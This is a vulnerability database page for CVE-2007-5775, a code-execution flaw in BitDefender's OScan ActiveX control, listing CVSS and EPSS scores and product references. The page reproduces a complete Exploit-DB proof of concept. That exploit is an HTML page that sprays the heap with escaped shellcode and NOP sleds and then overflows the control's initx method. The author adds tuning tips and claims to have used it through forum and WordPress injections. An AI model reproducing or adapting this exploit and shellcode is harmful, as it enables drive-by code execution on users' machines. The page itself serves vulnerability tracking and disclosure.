CVE-2007-5775 : Detail

CVE-2007-5775

34.13%V3
Network
2007-11-01
16h04 +00:00
2024-09-16
19h15 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in BitDefender allows attackers to execute arbitrary code via unspecified vectors, aka EEYEB-20071024. NOTE: as of 20071029, the only disclosure is a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4663

Publication date : 2007-11-26 23h00 +00:00
Author : Nphinity
EDB Verified : Yes

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BitDefender OScan8.ocx / Oscan81.ocx ActiveX Exploit =-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=- http://research.eeye.com/html/advisories/published/AD20071120.html http://secunia.com/advisories/27717/ This works not 100% - it corrupts random memory in the browser and Launches calculator with success. Users have had this installed since 2006! With no autoupdates :) Google Search of BD OSCAN = http://www.google.com/search?hl=ar&safe=off&rls=fr&hs=P4T&q=%225D86DDB5-BDF9-441B-9E9E-D4730F4EE499%22&btnG=Search Modify the values in these to help keep it stable: 'SiteAuthority' - different memory address ?? - it turns values to literal address ! while (SiteAuthority.length < 60000) - Maybe larger/smaller? Crashes IE even if it fails Tested with Forum XSS Injections + Wordpress 0day + CMS Injections Nphinity #SAMAH/#SYR/#SHAHADA mesra.kl.my.dal.net =-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=- <html> <object classid='clsid:5D86DDB5-BDF9-441B-9E9E-D4730F4EE499' id='BD'> </object> <script language="javascript"> SCPL = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); MemContent = unescape("%u0606"); HSize = 20; FreeSpace = HSize+SCPL.length while (MemContent.length<FreeSpace) { MemContent+=MemContent; } FB = MemContent.substring(0, FreeSpace); Mem = MemContent.substring(0, MemContent.length-FreeSpace); while(Mem.length+FreeSpace<0x60000) { Mem = Mem+Mem+FB; } memory = new Array(); for (x=0;x<600;x++) memory[x] = Mem + SCPL; var SiteAuthority = '%%'; while (SiteAuthority.length < 60000) { SiteAuthority+='\x30\x36\x30\x36'; } BD.initx(SiteAuthority); </script> </html> # milw0rm.com [2007-11-27]

Products Mentioned

Configuraton 0

Bitdefender>>Antivirus >> Version *

Bitdefender>>Internet_security >> Version *

Bitdefender>>Total_security >> Version *

References

http://www.securityfocus.com/bid/26210
Tags : vdb-entry, x_refsource_BID